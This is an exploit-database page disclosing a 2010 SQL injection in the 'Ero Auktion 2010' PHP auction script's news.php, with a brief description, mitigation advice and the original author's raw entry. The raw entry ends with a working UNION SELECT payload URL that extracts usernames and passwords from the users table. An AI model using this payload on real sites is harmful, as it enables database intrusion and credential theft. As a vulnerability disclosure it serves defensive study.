header-logo
Suggest Exploit
vendor:
Ero Auktion 2010
by:
Easy Laster
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Ero Auktion 2010
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Ero Auktion 2010 SQL Injection news.php

A vulnerability exists in the Ero Auktion 2010 website, which allows an attacker to inject malicious SQL commands into the 'news.php' page. This can be exploited to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

----------------------------Information----------------------------------------
+Autor : Easy Laster
+Date   : 21.10.2010
+Script  : Ero Auktion 2010 SQL Injection news.php
+Download : -----
+Price : 39,90€
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor.
--------------------------------------------------------------------------------
 ___ ___ ___ ___                     _ _                         _         _
| | |   |   | | |___ ___ ___ ___ ___|_| |_ _ _ ___ ___ ___ ___  |_|___ ___| |_
|_  | | | | |_  |___|_ -| -_|  _|  _| |  _| | |___| . |  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|_| |_|_| |_  |   |  _|_| |___|_| |___|___|_|
                                          |___|   |_|         |___|
--------------------------------------------------------------------------------
+Vulnerability : www.Site.com/news.php?id=[SQL]
+Exploitable   : www.Site.com/flashauktion2010/news.php?id=11111111+union+select
+1,2,concat%28name,0x3a,password%29,4,5+from+users#
--------------------------------------------------------------------------------